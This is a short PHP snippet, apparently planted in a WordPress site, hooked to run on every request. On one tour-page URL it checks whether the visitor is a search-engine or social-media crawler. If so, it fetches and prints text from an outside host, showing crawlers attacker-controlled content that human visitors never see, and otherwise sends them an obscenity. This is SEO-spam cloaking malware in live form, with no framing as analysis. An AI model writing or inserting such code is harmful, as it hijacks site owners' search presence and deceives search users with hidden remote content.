add_action('init', function () { $req = $_SERVER['REQUEST_URI'] ?? ''; $path = rtrim(parse_url($req, PHP_URL_PATH) ?: '/', '/'); $ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); if ($path === '/st_tour/sounio-cape-tour') { if (preg_match('/Googlebot|Google-inspectiontool|Bingbot|Slurp|duckduckbot|Baiduspider|Yandexbot|Applebot|Facebookexternalhit|Linkedinbot|Twitterbot|Pinterestbot|Slackbot|Telegrambot|Semrushbot|Ahrefsbot|Mj12bot|Petalbot|Sogou spider|Seznambot/i', $ua)) { $response = wp_remote_get('https://lihatini.org/tes.txt'); if (is_array($response) && !is_wp_error($response)) { $content = wp_remote_retrieve_body($response); if ($content) { echo $content; exit; } } echo 'cunt'; exit; } } });